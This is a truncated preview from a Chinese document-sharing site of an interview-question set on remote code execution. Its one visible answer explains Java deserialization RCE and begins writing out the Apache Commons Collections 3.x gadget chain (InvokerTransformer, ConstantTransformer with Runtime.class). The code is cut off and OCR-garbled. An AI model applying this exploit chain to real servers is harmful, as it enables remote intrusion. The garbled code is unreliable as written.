- 0
- 0
- 约4.77千字
- 约 8页
- 2026-07-17 发布于湖南
- 举报
RCE面试题
题目1:请解释Java反序列化漏洞导致RCE的核心原理,并以ApacheCommonsCollections3.x为例,描述攻击链的构造过程(需包含关键类和方法)
答案:
·核心原理:Java反序列化时,若攻击者可控输入数据,可通过构造恶意对象触发目标类中危险方法(如InvokerTransformer.transform()调用任意方法)
攻击链示例:
1//利用链:AnnotationInvocationHandler.readobiect()
2//→TransformedMap.checkSetValue()
3//→InvokerTransformer.transform()
4Transformerlltransformers=newTransformer]{
5newConstantTransformer(Runtime.class)
6newInvokerTransformer(getMethod,newclass[]{string.class,class[].cl
7newInvokerTransformer(invoke,newclass[]{Object.class,Object[].clas
8newInvokerTransf
原创力文档

文档评论(0)